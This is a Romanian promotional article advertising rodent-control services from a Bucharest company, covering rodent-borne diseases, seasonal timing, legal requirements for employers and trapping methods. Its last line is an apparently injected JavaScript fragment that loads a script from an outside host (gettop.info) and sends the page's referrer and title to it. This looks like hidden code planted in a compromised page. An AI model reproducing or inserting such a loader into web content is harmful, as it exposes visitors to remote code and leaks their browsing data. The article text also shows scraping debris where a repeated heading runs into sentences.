In fiecare primavara apeleaza si tu la servicii deratizare

Stiai ca este recomandat ca in fiecare primavara sa apelezi si tu la servicii deratizare? De asemenea, si in fiecare toamna este bine sa te ocupi de acest aspect pentru ca acestea sunt cele 2 perioade potrivite din an cand poti lupta eficient impotriva soarecilor, sobolanilor si a altor rozatoare care dau tarcoale casei si gospodariei tale.

De ce trebuie sa apelezi la servicii deratizare?

 

In fiecare primavara apeleaza si tu la servicii deratizareServicii deratizare reprezinta acel complex de masuri pe care o firma specializata le executa pentru a reduce, daca nu de tot macar substantial, populatia alcatuita din soareci si sobolani, si de a mentine cat mai redusa aceasta populatie.

De ce totusi sa apelezi la servicii deratizare? Deoarece rozatoarele, sobolanii si soarecii din gospodaria ta iti pot aduce pagube materiale serioase daca se vor inmulti peste masura. Insa, pe langa acest aspect, familiile numeroase reprezinta si un pericol permanent de raspandire a infectiilor pe scara larga atat la animalele din gospodaria ta, cat si la membrii familiei tale. Inmultirea in numar mare, mobilitatea si rezistenta lor deosebita, fac ca aceste mamifere sa transporte si sa largeasca rapid focarele naturale de boala.

Printre bolile deosebit de periculoase pe care soarecii si sobolanii le pot transmite si oamenilor se numara trichineloza, leptospiroza, bruceloza, antraxul, rujetul, toxinfectiile alimentare, pesta porcina, turbarea sau teniazele.

Servicii deratizare. Cand si unde?

 

Cand se face deratizarea? Tot timpul anului, asa spun specialistii, insa frecventa trebuie sa fie mai mare primavara si toamna, fiind momentul potrivit de a scapa de soareci si sobolani – frigul si lipsa hranei ii face mai vulnerabili.

Si cum rozatoarele s-au adaptat si mediului urban, nefiind deloc pretentiosi in ceea ce priveste hrana, este indicat ca deratizarea sa se faca in permanenta, in special in depozite, subsolurile blocurilor si a cladirilor vechi, retelele de canalizare sau zonele in care se depoziteaza deseurile.

In plus, chiar legea te obliga sa apelezi la servicii deratizare in mod constant. Daca esti angajator, indiferent ca esti persoana juridica sau persoana fizica, esti obligat sa apelezi la cei 3 D, adica dezinsectie, dezinfectie si deratizare, constant. La fiecare 3 luni apelezi la dezinsectie, iar din 6 in 6 luni trebuie sa chemi o firma ce se ocupa si cu servicii deratizare. Nu te supui acestei legi? Vei fi amendat cu sume usturatoare.

Servicii deratizare de la Igiena Romserv DDD

 

Daca esti o firma din capitala si esti in cautarea unui partener serios care sa se ocupe de servicii deratizare complete, ca la carte, Igiena Romserv DDD iti sta la dispozitie. Acesti In fiecare primavara apeleaza si tu la servicii deratizare1experti au experienta necesara de a lupta impotriva invadatorilor, au cunostintele necesare de a le face fata cu succes, dar beneficiaza si de proceduri si substante specifice care respecta legislatia aflata in vigoare – arsenalul lor de lupta.

Ca metode de combatere a acestor rozatoare, Igiena Romserv DDD apeleaza la capcane, momeli si la eliminarea punctelor de intrare a rozatoarelor. Printre cele mai eficiente si nedaunatoare omului se numara capcanele cu momeli. Se recurge la pudra de talc amplasata strategic in punctele de intrare, iar in acest mod se descopera unde este focarul de infectie si apoi se aplica momelile sau alte solutii care vor asigura reusita actiunii.

Daca vrei sa te bucuri de calitate, alege servicii deratizare de la Igiena Romserv DDD. Ai nevoie de informatii suplimentare despre firma si serviciile Igiena Romserv DDD? Pentru detalii, suna la numarul 0762-530.792 sau trimite un e-mail pe adresa igiena.romservddd@yahoo.com.

Articol oferit de zoom-biz.ro.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;